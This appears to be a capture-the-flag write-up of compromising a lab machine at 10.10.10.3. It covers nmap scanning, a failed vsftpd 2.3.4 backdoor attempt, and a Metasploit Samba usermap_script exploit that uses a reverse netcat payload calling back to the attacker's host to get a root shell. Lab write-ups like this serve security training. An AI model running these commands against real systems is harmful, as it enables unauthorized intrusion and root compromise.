So we begin, as always, with our initial nmap scan.
$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.3
First look shows that there is an FTP service running which allows anonymous login, so lets take a peek and see what we can find.
Which unfortunately appears to be nothing :(
However, the nmap scan revealed the version of FTP software running is vsftpd 2.3.4. A quick
searchsploit shows that this version of the software has a backdoor command execution vulnerability. Let's see if we can take advantage of this.
Looking at further information about this exploit shows it is a metasploit module, so lets fire up
msfconsole and give it a whirl.
Lame indeed. It seems that while vsftpd 2.3.4 does have a backdoor command execution, this particular version must have been patched. So let's go back to our nmap scan and look for other attack vectors.
Our next likely candidate for attack presents itself, as the ports for Samba are open. These are always good to have a poke at given the history of security issues that have come up with Samba over the years.
Nmap has a number of scripts we can run to check for Samba vulnerabilities, so that's what we will try first.
$ nmap --script smb-vuln* 10.10.10.3 --script-args=unsafe=1 -p 445 10.10.10.3
Unfortunately this also fails to find anything. However, taking the version number of Samba running from our initial nmap scan (3.0.20), we can run
searchsploit which does present us with another likely candidate.
The second entry is a remote heap overflow so unlikely to help us here, but the first one looks more promising. It's another metasploit module, so let's fire up msfconsole again and give it a go.
We run the following:
> use exploit/multi/samba/usermap_script > set rhost 10.10.10.3 > set payload cmd/unix/reverse_netcat > set lhost 10.10.14.15 > exploit
And straight away we get a root shell, along with access to both flags :)